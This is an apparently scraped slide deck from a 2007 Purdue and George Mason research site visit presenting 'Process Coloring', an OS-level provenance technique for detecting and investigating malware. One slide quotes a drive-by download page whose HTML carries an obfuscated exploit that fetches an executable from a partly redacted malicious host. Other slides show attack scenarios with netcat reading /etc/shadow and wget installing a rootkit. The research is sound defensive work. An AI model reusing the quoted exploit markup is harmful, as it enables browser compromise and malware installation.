NICIAR Site Visit West Lafayette IN July 19

  • Slides: 36
Download presentation
NICIAR Site Visit, West Lafayette , IN, July 19, 2007 Process Coloring: an Information

NICIAR Site Visit, West Lafayette , IN, July 19, 2007 Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University Xuxian Jiang Department of Information and Software Engineering George Mason University 1

Motivation q Internet malware remains a top threat Q Malware: virus, worms, rootkits, spyware,

Motivation q Internet malware remains a top threat Q Malware: virus, worms, rootkits, spyware, bots…

Motivation

Motivation

Motivation q q Upon Clicking a malicious URL Q http: //xxx. 9 x. xx

Motivation q q Upon Clicking a malicious URL Q http: //xxx. 9 x. xx 8. 8 x/users/xxxx/laxx/z. html Result: <html><head><title></head><body> MS 05 -002 MS 03 -011 MS 04 -013 <style> * {CURSOR: url("http: //vxxxxxxe. biz/adverts/033/sploit. anr")} </style> <APPLET ARCHIVE='count. jar' CODE='Black. Box. class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http: //vxxxxxxe. biz/adverts/033/win 32. exe'></APPLET> <script> try{ document. write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101: //C: fo'+'o. mht!'+'http: //vxxxx'+'xxe. biz//adv'+'erts//033//targ. ch'+ 'm: : /targ'+'et. htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){} </script> </body></html> 22 unwanted programs are installed without user’s consent!

Our Challenge: Enabling Timely, Efficient Malware Investigation q q q Raising timely alert to

Our Challenge: Enabling Timely, Efficient Malware Investigation q q q Raising timely alert to trigger a malware investigation Identifying the break-in point of the malware Reconstructing all contaminations by the malware Break-in point trace-back Contamination reconstruction Log External detection point Infection Detection Time Today’s log-based intrusion investigation tools (e. g. , Back. Tracker, Taser)

Limitations of Today’s Tools q q q Long “infection-to-detection” interval Entire log needed for

Limitations of Today’s Tools q q q Long “infection-to-detection” interval Entire log needed for both trace-back and reconstruction Questionable trustworthiness of log data Break-in point trace-back Contamination reconstruction Log External detection point Infection Detection Existing log-based intrusion investigation tools Time

Goals of Research q Improve malware defense capabilities of enterprise computing infrastructure: Q Detection

Goals of Research q Improve malware defense capabilities of enterprise computing infrastructure: Q Detection of malware activity Identification of vulnerable programs/applications Accountability of computation activities Recoverability from malware contaminations Q Proactive protection of sensitive information/data Q Q Q q Demonstrate via success metrics with respect to: Q Timeliness Efficiency Q Accuracy Q

Goals of Research q Goals fit within NICECAP research themes Q “Accountable information flows”

Goals of Research q Goals fit within NICECAP research themes Q “Accountable information flows” v Based on information flow theory Instantiated at operating system level v Holding malware accountable v Q “Large-scale system defense” v v v Targeting large-scale malware infection (e. g. , botnets) Enabling malware detection and remediation Providing first line of response (applicable to legacy applications w/o source code)

Technical Approach: Process Coloring q Key idea: propagating malware break-in provenance information (“colors”) along

Technical Approach: Process Coloring q Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows Q Existing tools only consider direct causality relations without preserving and exploiting break-in provenance information Virtual Machine … Log Monitor My. SQL Logger DNS Sendmail Guest OS Virtual Machine Monitor (VMM) Runtime alert triggered by log color anomalies Apache Attacker

New Capabilities of Process Coloring q q q Color-based malware warning (vs. external detection

New Capabilities of Process Coloring q q q Color-based malware warning (vs. external detection point) Color-based break-in point identification (vs. back-tracking) Color-based log partitioning (vs. entire log) for reconstruction Break-in point Contamination reconstruction Infection Detection Time

Impact of Success q How will it benefit the NIC? Q Q Accountability of

Impact of Success q How will it benefit the NIC? Q Q Accountability of NIC cyber infrastructure Readiness against current and emerging malware threats (e. g. , botnets, rootkits, spyware) to NIC Protection of NIC critical data, information, and computation activities Reduction of NIC human labor in malware investigation

Impact of Success q How will it benefit the IA Community Q Q Systematic

Impact of Success q How will it benefit the IA Community Q Q Systematic model for OS-level information flows Mechanisms and policies for elevated accountability of commodity OS Tools and methods for malware alert, investigation, and recovery Artifacts, data, insights and lessons for further malware research

Sample Scenario Question 2: How does the malware break into the system? httpd Question

Sample Scenario Question 2: How does the malware break into the system? httpd Question 3: What does the malware do after break-in? netcat /bin/sh Question 1: How is the malware detected? • • /etc/shadow Confidential Info Local files wget Root kit Alert

Existing Approach 1. Online log collection “/bin/sh” CREATES a new process “netcat” Log “netcat”

Existing Approach 1. Online log collection “/bin/sh” CREATES a new process “netcat” Log “netcat” READS “/etc/shadow” file “httpd” READS an incoming request httpd netcat • • “/bin/sh” MODIFIES local files /bin/sh “httpd” CREATES a new process “/bin/sh” CREATES a new process “wget” /etc/shadow Confidential Info Local files wget “wget” CREATES local file(s) - “Root kit” External detection point Root kit Alert

Existing Approach 1. Online log collection “httpd” CREATES a new process “/bin/sh” 2. Offline

Existing Approach 1. Online log collection “httpd” CREATES a new process “/bin/sh” 2. Offline backward tracking “wget” CREATES local Log file(s) - “Root kit” “/bin/sh” CREATES a new process “wget” Break-in Point ! httpd /bin/sh External detection point wget Backward Tracking [King+, SOSP’ 03] Root kit Alert

Existing Approach 1. Online log collection 2. Offline backward tracking 3. Offline forward tracking

Existing Approach 1. Online log collection 2. Offline backward tracking 3. Offline forward tracking Break-in Point ! Log “netcat” READS “/etc/shadow” file “/bin/sh” CREATES a new process “netcat” httpd netcat • • “/bin/sh” MODIFIES local files “httpd” CREATES a /bin/sh new process “/bin/sh” CREATES a new process “wget” Local files wget “wget” CREATES local file(s) - “Root kit” /etc/shadow Confidential Info Forward Tracking External detection point Root kit Alert

Process Coloring Approach Capability 1: Color-based malware warning 1. Initial coloring s 30 sendmail

Process Coloring Approach Capability 1: Color-based malware warning 1. Initial coloring s 30 sendmail s 55 sshd Log s 45 named init rc s 80 httpd netcat /bin/sh Capability 2: Color-based identification of break-in point Local files • • /etc/shadow Confidential Capability 3: Info Color-based log partition for contamination analysis 2. Coloring diffusion wget Root kit

Timeliness by Process Coloring: Color-Based Malware Warning. . . BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438)

Timeliness by Process Coloring: Color-Based Malware Warning. . . BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5 BLUE: 673["sendmail"]: 192_mmap 2(0, 4096, 3, 34, 4294967295, 0) = 1073868800 BLUE: 673["sendmail"]: 3_read(5, "0. 26 0. 10 0. 03 2. . . ", 4096) = 25 BLUE: 673["sendmail"]: 6_close(5) = 0 BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0. . . RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff 3 a}, cbbdff 38) = 5 RED: 2568["httpd"]: 3_read(5, "1281124. . . ", 11) = 11 RED: 2568["httpd"]: 3_read(5, "7À51283. . . ", 40) = 40 Capability 1: RED: 2568["httpd"]: 4_write(5, "132@412. . . ", 1090) = 1090 malware warning: Color-based … “unusual color inheritance” RED: 2568["httpd"]: 4_write(5, "12819Ê13618. . . ", 21) = 21 RED: 2568["httpd"]: 63_dup 2(5, 2) = 2 RED: 2568["httpd"]: 63_dup 2(5, 1) = 1 RED: 2568["httpd"]: 63_dup 2(5, 0) = 0 RED: 2568["httpd"]: 11_execve("/bin//sh", bffff 4 e 8, 0000) RED: 2568["sh"]: 5_open("/etc/ld. so. prelo. . . ", 0, 8) = − 2 RED: 2568["sh"]: 5_open("/etc/ld. so. cache", 0, 0) = 6

Timeliness by Process Coloring Color-Based Malware Warning q Another example: “color mixing” RED: 1234

Timeliness by Process Coloring Color-Based Malware Warning q Another example: “color mixing” RED: 1234 ["httpd"]: … RED+BLUE: 1234 ["httpd"]: system call to read file index. html httpd bind cp defaced. html index. html

Efficiency by Process Coloring Time period being analyzed # wormrelated entries Lion Slapper SARS

Efficiency by Process Coloring Time period being analyzed # wormrelated entries Lion Slapper SARS 24 hours Capability 2: Color-based identification 66, 504 break-in point 195, 884 19, 494 Exploited Service BIND (CVE-2001 -0010) Apache (CAN-2002 -0656) Samba (CAN-2003 -0085) % of Log Inspected 48. 7% 65. 9% 12. 1% Capability 3: Color-based log partitioning

Accuracy by Process Coloring q Accuracy of color-based malware warning Q q False positives

Accuracy by Process Coloring q Accuracy of color-based malware warning Q q False positives and false negatives Accuracy of malware contamination reconstruction Q Q Q Sufficiency of log partition (“no useful log entries left out”) Compare malware action graphs with published malware analysis report Limitation of causality-based reconstruction algorithms (e. g. , Back. Tracker, Taser)

Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example inet_sock(80) recv 2568: httpd accept

Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example inet_sock(80) recv 2568: httpd accept execve dup 2, read fd 5 2568(execve): /bin//sh execve 2568(execve): /bin/bash -i fork, execve 2587: /bin/cat open, dup 2, write /tmp/. uubugtraq fork, execve 2586: /bin/rm –rf /tmp/. bugtraq. c unlink /tmp/. bugtraq. c

Research Task I: Color Diffusion Model (Month 1 -6) q Color Diffusion Model Operation

Research Task I: Color Diffusion Model (Month 1 -6) q Color Diffusion Model Operation Diffusion syscalls create, mkdir, link CREATE create <s 1, o 1> create <s 1, s 2> READ read <s 1, o 1> read <s 1, s 2> color(s 1) = color(s 1)υ color(o 1) read, readv, recv WRITE write <s 1, o 1> write <s 1, s 2> color(o 1) = color(s 1)υ color(o 1) write, writev, send color(o 1) = color(s 1) color(s 2) = color(s 1)υ color(s 2) ptrace color(s 2) = color(s 1)υ color(s 2) Ptrace, wait, signal DESTROY destroy <s 1, o 1> destroy <s 1, s 2> q fork, vfork, clone OS-level Information Flows unlink, rmdir, close exit, kill

Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2

Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2 -18) q Server-side malware investigation Q Q Q q Consolidated server environment with independent server applications “Clustered” information flows partitioned by server applications Color mixing highly unlikely between applications Client-side malware investigation Q Q Q Inter-dependent client applications (e. g. , text editor compiler; latex dvips ps 2 pdf) More inter-application information flows Legal color mixing exists

Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2

Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2 -18) q A motivating example of client-side process coloring + FTP Quick Tax Time

Research Task III: Color Mixing Handling via Information Flow Control (Month 7 -18) q

Research Task III: Color Mixing Handling via Information Flow Control (Month 7 -18) q Profiling legal color mixing inside a client host Q Q q Shared files Helper processes Approach 1: information flow insulation P 1 P 2 Shared file P 1 P 2 Shared File Insulated q Approach 2: information flow border control

Related Work Based on Information Flows q Instruction level information flows Q q Language

Related Work Based on Information Flows q Instruction level information flows Q q Language level information flows Q q Lacking system-wide semantic information (e. g. , info. about processes and files) Focusing on information flows inside a program Operating system level information flows Q Q Q Complementing the above categories Revealing system-wide semantic information Benefiting detection, recovery, and forensics as first line of defense

Metrics: Definitions q Timeliness Q q Malware infection-to-warning interval Efficiency Q Percentage of log

Metrics: Definitions q Timeliness Q q Malware infection-to-warning interval Efficiency Q Percentage of log reduction for malware contamination reconstruction q Accuracy Q False positive rate of malware warning Q False negative rate of malware warning Q Correctness of malware action graphs

Metrics: Evaluation Plan q Sources of malware Q Q q Target computing environments Q

Metrics: Evaluation Plan q Sources of malware Q Q q Target computing environments Q Q q Consolidated servers Clients Experiment environments Q Q q Repository of malware (worms, botware, rootkits) Malware captured by honeypots and honeyfarm VM-based honeyfarm (Collapsar) VM-based malware playground (v. Ground) Methodology: Evaluate by comparison Q Q With process coloring Without process coloring

Project Organization and Management q Purdue Team Q Faculty v v Q Eugene Spafford

Project Organization and Management q Purdue Team Q Faculty v v Q Eugene Spafford Dongyan Xu George Mason Team Q v Ryan Riley Larissa O’Brien TBD Budget v v $xxx, xxx Faculty v Q Graduate students v Q q Q Xuxian Jiang Graduate student v TBD Budget v $xxx, xxx

Project Organization and Management Quarterly Program Reviews June 7 th, 2007 Tasks 1 2

Project Organization and Management Quarterly Program Reviews June 7 th, 2007 Tasks 1 2 3 4 5 6 7 8 9 10 Site Visit 11 12 13 14 15 16 17 18 1. Task I (Section 3. 1) 2. Task II (Section 3. 2) 2. 1 Subtask II. 1 2. 2 Subtask II. 2 2. 3 Subtask II. 3 3. Task III (Section 3. 3) - III. 1 3. 1 Subtask 3. 2 Subtask III. 2 3. 3 Subtask III. 3 . 4. Meetings and Document Prep 5. Prototype Instantiation #1 Software Deliverable #2 #3 Experiments Software Demonstrations Basic Xen-based prototype Tools for malware investigation Mechanisms for color mixing control

Project Organization and Management Spending during Summer’ 07: • Purdue: One month graduate student

Project Organization and Management Spending during Summer’ 07: • Purdue: One month graduate student support (half-time) • GMU: One month summer salary (planned)

Recent Progress Quarterly Program Reviews June 7 th, 2007 Tasks 1 2 3 4

Recent Progress Quarterly Program Reviews June 7 th, 2007 Tasks 1 2 3 4 5 6 7 8 9 10 11 Site Visit 12 13 14 15 16 17 18 1. Task I (Section 3. 1) 2. Task II (Section 3. 2) 2. 1 Subtask II. 1 2. 2 Subtask II. 2 2. 3 Subtask II. 3 3. Task III (Section 3. 3) - III. 1 3. 1 Subtask 3. 2 Subtask III. 2 3. 3 Subtask III. 3 . 4. Meetings and Document Prep 5. Prototype Instantiation Software Deliverable #1 #2 #3 Experiments Software Demonstrations We are here • Identifying color diffusion operations in Linux OS • Starting to implement log coloring and collection on Xen VMM

Projected Progress in the Next 3 -6 Months Quarterly Program Reviews June 7 th,

Projected Progress in the Next 3 -6 Months Quarterly Program Reviews June 7 th, 2007 Tasks 1 2 3 4 5 6 7 8 9 10 11 Site Visit 12 13 14 15 16 17 18 1. Task I (Section 3. 1) 2. Task II (Section 3. 2) 2. 1 Subtask II. 1 2. 2 Subtask II. 2 2. 3 Subtask II. 3 3. Task III (Section 3. 3) - III. 1 3. 1 Subtask 3. 2 Subtask III. 2 3. 3 Subtask III. 3 . 4. Meetings and Document Prep 5. Prototype Instantiation Software Deliverable #1 #2 #3 Experiments Software Demonstrations • 11/21/07: A comprehensive color diffusion model under Linux • 12/07/07: Demo and software release of basic Xen-based prototype

Technology Transfer Plan q Potential adopters Q Q q q q Computer forensics/malware investigators

Technology Transfer Plan q Potential adopters Q Q q q q Computer forensics/malware investigators and researchers System administrators Anti-malware software companies Open source communities (e. g. , Xen. Source) Software release and documentation Presentations and demos to potential NIC adopters Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)

Thank you! For more information about the Process Coloring project: http: //cairo. cs. purdue.

Thank you! For more information about the Process Coloring project: http: //cairo. cs. purdue. edu/projects/pc PC@cs. purdue. edu